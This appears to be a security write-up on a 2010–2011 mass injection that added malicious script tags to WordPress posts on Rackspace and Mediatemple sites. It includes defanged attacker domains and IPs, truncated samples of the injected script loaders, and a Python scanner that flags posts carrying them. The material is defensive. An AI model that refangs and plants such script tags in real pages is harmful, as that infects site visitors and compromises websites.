Description:
Malware injections related to the massive hacks of websites hosted on Rackspace and Mediatemple back in 2010-2011.
Loads malware from the following URLs (all of them pointing to 91.188.59.203):
hxxp://ae.awaue[.]com hxxp://ie.eracou[.]com hxxp://ao.euuaw[.]com hxxp://aeaaea[.]com/ou hxxp://secree[.]com/re hxxp://uoauer[.]com/si hxxp://oeooea[.]com/ve hxxp://secowo[.]com/wo hxxp://seconeo[.]com/on hxxp://ouroue[.]com/se hxxp://avoen[.]info/e
After that, the attack used 188.72.194.172: hxxp://w3.fairygoodideas[.]com/in.cgi?2
Typical injected code
< script src = hxxp://ao.euuaw[.]com/9 ....
< script src = hxxp://ae.awaue[.]com/7 ...
< script src = hxxp://eaaea[.]com/o ...
It infects all posts inside the WordPress database (wp_posts).
Affecting: WordPress websites. Mostly on Rackspace and Mediatemple.
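A check for the injection described above, as an added example that is not part of the original write-up: it scans post bodies, as returned by a query over wp_posts, for script tags whose host is one of the listed domains. The function names and sample rows are constructed for illustration; hosts stay defanged in the source and are refanged only at run time.

```python
import re
from urllib.parse import urlsplit
# Hosts listed in the description above, kept defanged in source.
DEFANGED_HOSTS = [
    "ae.awaue[.]com", "ie.eracou[.]com", "ao.euuaw[.]com", "aeaaea[.]com",
    "secree[.]com", "uoauer[.]com", "oeooea[.]com", "secowo[.]com",
    "seconeo[.]com", "ouroue[.]com", "avoen[.]info", "w3.fairygoodideas[.]com",
]

def refang(text):
    """Turn the page's defanged notation back into matchable text."""
    return text.replace("hxxp", "http").replace("[.]", ".")

IOC_HOSTS = {refang(h) for h in DEFANGED_HOSTS}
# <script ... src=...>, tolerating loose whitespace and missing quotes.
SCRIPT_SRC = re.compile(
    r"<\s*script\b[^>]*?\bsrc\s*=\s*[\"']?\s*([^\"'\s>]+)", re.IGNORECASE)

def script_hosts(html):
    """Return the lower-cased host of every <script src=...> found in html."""
    hosts = []
    for src in SCRIPT_SRC.findall(html):
        try:
            # Protocol-relative URLs (//host/path) need a scheme to parse.
            host = urlsplit("http:" + src if src.startswith("//") else src).hostname
        except ValueError:
            continue  # malformed URL, nothing to compare
        if host:
            hosts.append(host)
    return hosts

def is_ioc(host):  # a listed host, or any subdomain of it
    return any(host == h or host.endswith("." + h) for h in IOC_HOSTS)

def find_injected_posts(rows):
    """rows: iterable of (ID, post_content) from wp_posts -> {ID: [hosts]}."""
    hits = {}
    for post_id, content in rows:
        bad = sorted({h for h in script_hosts(content or "") if is_ioc(h)})
        if bad:
            hits[post_id] = bad
    return hits

# Constructed rows standing in for: SELECT ID, post_content FROM wp_posts
SAMPLE_ROWS = [(i, refang(c)) for i, c in [
    (1, "<p>Hi</p><script src=hxxp://ao.euuaw[.]com/9></script>"),
    (2, '<p>Clean</p><script src="https://example.org/app.js"></script>'),
    (3, "< SCRIPT type='text/javascript' src = 'hxxp://AE.awaue[.]com/7'></script>"),
]]
```

Calling find_injected_posts(SAMPLE_ROWS) reports posts 1 and 3; feed it rows from a read-only database account or a SQL dump so the scan cannot alter the site.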
Mitigation
How to clean a hacked WordPress site